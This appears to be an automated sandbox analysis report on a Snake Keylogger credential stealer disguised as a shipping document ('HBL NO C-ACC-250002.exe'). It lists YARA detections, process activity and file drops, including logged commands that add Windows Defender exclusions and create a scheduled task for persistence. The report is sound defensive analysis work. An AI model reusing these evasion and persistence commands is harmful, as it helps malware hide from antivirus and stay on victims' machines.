Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2090620842.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs HBL NO C-ACC-250002.exe
Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2094914013.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUI vs HBL NO C-ACC-250002.exe
Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs HBL NO C-ACC-250002.exe
Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs HBL NO C-ACC-250002.exe
Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2091660215.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs HBL NO C-ACC-250002.exe
Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2091660215.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs HBL NO C-ACC-250002.exe
Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2095748607.0000000007160000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs HBL NO C-ACC-250002.exe
Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2091660215.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs HBL NO C-ACC-250002.exe
Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4496936697.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs HBL NO C-ACC-250002.exe
Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs HBL NO C-ACC-250002.exe
Source: HBL NO C-ACC-250002.exe	Binary or memory string: OriginalFilenamesPTL.exe2 vs HBL NO C-ACC-250002.exe

Source: HBL NO C-ACC-250002.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: HBL NO C-ACC-250002.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: uyDicX.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, Z--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, Z--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, Z--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, Z--.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, GW9cD1MmeOsIOgrcql.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, GW9cD1MmeOsIOgrcql.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, GW9cD1MmeOsIOgrcql.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, GW9cD1MmeOsIOgrcql.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, GW9cD1MmeOsIOgrcql.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, GW9cD1MmeOsIOgrcql.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, iyFcKGg9tCppqGG5IB.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, iyFcKGg9tCppqGG5IB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, iyFcKGg9tCppqGG5IB.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, iyFcKGg9tCppqGG5IB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

File created: C:\Users\user\AppData\Roaming\uyDicX.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Mutant created: \Sessions\1\BaseNamedObjects\xkvsFtVYwLIvCBOVLtigPPSEQi

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

File created: C:\Users\user\AppData\Local\Temp\tmp61D1.tmp

Jump to behavior

Source: HBL NO C-ACC-250002.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: HBL NO C-ACC-250002.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4503070119.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D4D000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002F89000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: HBL NO C-ACC-250002.exe	Virustotal: Detection: 43%
Source: HBL NO C-ACC-250002.exe	ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

File read: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uyDicX.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\uyDicX.exe C:\Users\user\AppData\Roaming\uyDicX.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process created: C:\Users\user\AppData\Roaming\uyDicX.exe "C:\Users\user\AppData\Roaming\uyDicX.exe"
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uyDicX.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process created: C:\Users\user\AppData\Roaming\uyDicX.exe "C:\Users\user\AppData\Roaming\uyDicX.exe"	Jump to behavior

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: profapi.dll	Jump to behavior
